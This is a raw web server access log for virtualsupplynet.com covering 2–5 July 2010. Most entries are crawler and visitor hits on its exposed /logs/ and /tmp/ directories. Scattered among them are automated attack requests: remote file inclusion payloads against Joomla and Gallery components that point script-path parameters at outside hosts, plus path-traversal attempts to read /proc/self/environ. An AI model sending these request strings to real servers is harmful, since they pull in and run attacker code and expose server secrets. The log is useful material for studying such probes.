208.80.193.37 - - [02/Jul/2010:19:16:27 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ESB{E989EFC7-11E5-4A95-AD46-278D2559EB64}; SV1; .NET CLR 1.1.4322)" "www.virtualsupplynet.com"
117.53.96.161 - - [02/Jul/2010:20:39:43 -0700] "HEAD / HTTP/1.0" 200 0 "http://www.virtualsupplynet.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.virtualsupplynet.com"
77.88.31.246 - - [02/Jul/2010:20:50:20 -0700] "GET /logs/ HTTP/1.1" 200 3941 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
207.46.199.38 - - [02/Jul/2010:22:15:54 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
207.46.199.38 - - [02/Jul/2010:22:20:30 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
174.129.171.140 - - [02/Jul/2010:23:37:08 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
174.129.171.140 - - [02/Jul/2010:23:37:08 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
174.129.171.140 - - [02/Jul/2010:23:37:50 -0700] "GET /?N=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
174.129.171.140 - - [02/Jul/2010:23:37:55 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
174.129.171.140 - - [02/Jul/2010:23:38:17 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
174.129.171.140 - - [02/Jul/2010:23:38:44 -0700] "GET /?N=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
174.129.171.140 - - [02/Jul/2010:23:38:48 -0700] "GET /?S=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
91.142.209.202 - - [03/Jul/2010:00:05:49 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
91.142.209.202 - - [03/Jul/2010:00:05:49 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://maniacos.net/htaccess?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
66.235.124.132 - - [03/Jul/2010:02:05:54 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.virtualsupplynet.com"
66.235.124.132 - - [03/Jul/2010:02:05:54 -0700] "GET /logs/access_081220.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.virtualsupplynet.com"
203.251.80.167 - - [03/Jul/2010:03:20:47 -0700] "GET /logs//index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
203.251.80.167 - - [03/Jul/2010:03:20:48 -0700] "GET /index.php?option=com_hashcash&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
94.23.1.111 - - [03/Jul/2010:04:46:03 -0700] "GET /errors/needinit.php?GALLERY_BASEDIR=http://iwantitlist.com/components/com_poll/assets/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
94.23.1.111 - - [03/Jul/2010:04:46:03 -0700] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://iwantitlist.com/components/com_poll/assets/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
94.23.1.111 - - [03/Jul/2010:04:46:03 -0700] "GET /logs/access_100515.log//errors/needinit.php?GALLERY_BASEDIR=http://iwantitlist.com/components/com_poll/assets/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
67.195.110.174 - - [03/Jul/2010:05:13:48 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [03/Jul/2010:05:13:50 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
66.71.245.122 - - [03/Jul/2010:07:34:08 -0700] "GET /logs//export.php?mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
66.71.245.122 - - [03/Jul/2010:07:34:08 -0700] "GET /logs//export.php?mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
66.71.245.122 - - [03/Jul/2010:07:34:08 -0700] "GET /export.php?mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
66.71.245.122 - - [03/Jul/2010:07:34:08 -0700] "GET /export.php?mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
66.71.245.122 - - [03/Jul/2010:07:34:10 -0700] "GET /logs//export.php?mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
66.71.245.122 - - [03/Jul/2010:07:34:10 -0700] "GET /export.php?mosConfig_absolute_path=polimelaka.edu.my/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
92.241.190.214 - - [03/Jul/2010:07:38:09 -0700] "GET /logs//export.php?mosConfig_absolute_path=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
92.241.190.214 - - [03/Jul/2010:07:38:10 -0700] "GET /export.php?mosConfig_absolute_path=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
208.80.193.121 - - [03/Jul/2010:07:39:05 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {62AC8B44-3A61-44CD-BB5A-518625EF4DA5}; .NET CLR 1.1.4322)" "virtualsupplynet.com"
174.142.75.205 - - [03/Jul/2010:08:17:17 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
174.142.75.205 - - [03/Jul/2010:08:17:17 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
77.88.31.246 - - [03/Jul/2010:10:26:43 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [03/Jul/2010:14:06:37 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [03/Jul/2010:14:06:37 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [03/Jul/2010:14:06:40 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [03/Jul/2010:14:06:40 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [03/Jul/2010:14:06:41 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [03/Jul/2010:14:06:41 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
77.88.31.246 - - [03/Jul/2010:14:35:37 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.115.249 - - [03/Jul/2010:15:27:58 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [03/Jul/2010:15:27:59 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [03/Jul/2010:15:30:21 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:07:58 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:07:59 -0700] "GET /?N=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:00 -0700] "GET /?M=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:02 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:03 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:04 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:05 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:07 -0700] "GET /?N=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:08 -0700] "GET /?M=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:09 -0700] "GET /?S=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:11 -0700] "GET /?D=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:13 -0700] "GET /logs/?N=D HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:14 -0700] "GET /logs/?M=A HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:16 -0700] "GET /logs/?S=A HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:17 -0700] "GET /logs/?D=A HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:18 -0700] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:19 -0700] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:20 -0700] "GET /logs/?N=A HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:22 -0700] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:24 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:25 -0700] "GET /logs/?M=D HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:27 -0700] "GET /logs/?D=D HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:27 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:28 -0700] "GET /logs/?S=D HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:30 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:32 -0700] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
94.75.229.132 - - [03/Jul/2010:16:08:34 -0700] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Purebot/1.1; +http://www.puritysearch.net/)" "www.virtualsupplynet.com"
88.250.57.232 - - [03/Jul/2010:16:43:44 -0700] "GET /logs/access_100702.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [03/Jul/2010:16:44:00 -0700] "GET /logs/access_100703.log HTTP/1.0" 200 96073 "-" "Wget/1.11.4" "virtualsupplynet.com"
77.88.31.246 - - [03/Jul/2010:18:58:33 -0700] "GET /logs/access_100227.log HTTP/1.1" 200 84763 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
92.243.84.109 - - [03/Jul/2010:20:06:31 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
92.243.84.109 - - [03/Jul/2010:20:06:31 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.virtualsupplynet.com"
207.46.204.188 - - [03/Jul/2010:21:07:03 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
207.46.204.188 - - [03/Jul/2010:21:11:34 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
77.88.31.246 - - [03/Jul/2010:23:21:19 -0700] "GET /logs/access_100515.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
208.80.193.39 - - [03/Jul/2010:23:53:52 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SV1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.virtualsupplynet.com"
77.88.31.246 - - [04/Jul/2010:03:43:44 -0700] "GET /logs/access.log HTTP/1.1" 200 15294 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.110.174 - - [04/Jul/2010:04:10:11 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [04/Jul/2010:04:10:12 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
41.209.121.62 - - [04/Jul/2010:04:57:39 -0700] "GET /logs/access_100410.log HTTP/1.1" 200 75311 "http://www.google.com/search?q=com_sef%26Itemid%3D%26mosConfig&hl=en&client=firefox-a&hs=z8i&rls=org.mozilla:en-US:official&ei=EXcwTL_HFYjesAbP9tm2Ag&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729)" "www.virtualsupplynet.com"
41.209.121.62 - - [04/Jul/2010:04:57:45 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729)" "www.virtualsupplynet.com"
41.209.121.62 - - [04/Jul/2010:04:57:47 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729)" "www.virtualsupplynet.com"
208.80.193.37 - - [04/Jul/2010:08:41:08 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; formatnec; FunWebProducts)" "virtualsupplynet.com"
69.58.178.29 - - [04/Jul/2010:08:42:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.29 - - [04/Jul/2010:08:42:24 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.29 - - [04/Jul/2010:08:42:25 -0700] "GET /?N=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.29 - - [04/Jul/2010:08:42:26 -0700] "GET /?M=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.29 - - [04/Jul/2010:08:42:27 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.29 - - [04/Jul/2010:08:42:28 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.29 - - [04/Jul/2010:08:42:29 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.29 - - [04/Jul/2010:08:42:30 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.29 - - [04/Jul/2010:08:42:31 -0700] "GET /?N=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.29 - - [04/Jul/2010:08:42:32 -0700] "GET /?M=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
69.58.178.29 - - [04/Jul/2010:08:42:33 -0700] "GET /?S=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.virtualsupplynet.com"
67.195.115.249 - - [04/Jul/2010:10:45:28 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [04/Jul/2010:10:45:29 -0700] "GET /logs/ HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [04/Jul/2010:10:47:20 -0700] "GET /logs/access_100703.log HTTP/1.0" 200 96073 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [04/Jul/2010:10:48:03 -0700] "GET /logs/access_100619.log HTTP/1.0" 200 114275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [04/Jul/2010:10:49:54 -0700] "GET /logs/?S=A HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.110.174 - - [04/Jul/2010:11:31:11 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [04/Jul/2010:14:44:27 -0700] "GET /logs/access_091107.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
88.250.57.232 - - [04/Jul/2010:16:37:32 -0700] "GET /logs/access_100703.log HTTP/1.0" 200 96073 "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [04/Jul/2010:16:37:34 -0700] "GET /logs/access_100704.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
67.195.110.174 - - [04/Jul/2010:18:43:06 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [04/Jul/2010:18:43:06 -0700] "GET /logs/?N=D HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
173.203.102.222 - - [04/Jul/2010:19:05:58 -0700] "GET /logs/access_100410.log HTTP/1.0" 200 75311 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.virtualsupplynet.com"
192.228.230.3 - - [04/Jul/2010:20:03:36 -0700] "GET /logs/access.log HTTP/1.1" 200 21641 "-" "Mozilla/8.0" "www.virtualsupplynet.com"
208.80.193.39 - - [05/Jul/2010:00:32:32 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.0.1; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 1.1.4322; ZangoToolbar 4.8.3)" "www.virtualsupplynet.com"
77.221.130.30 - - [05/Jul/2010:01:27:48 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
77.221.130.30 - - [05/Jul/2010:01:27:48 -0700] "GET /logs/access_100522.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
77.221.130.30 - - [05/Jul/2010:01:27:48 -0700] "GET /logs/access_100410.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
77.221.130.30 - - [05/Jul/2010:01:27:48 -0700] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.tv-k.dk/media/data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
67.195.110.174 - - [05/Jul/2010:05:17:26 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [05/Jul/2010:05:17:27 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
95.108.150.235 - - [05/Jul/2010:06:17:43 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [05/Jul/2010:06:17:44 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [05/Jul/2010:06:17:44 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [05/Jul/2010:06:17:45 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
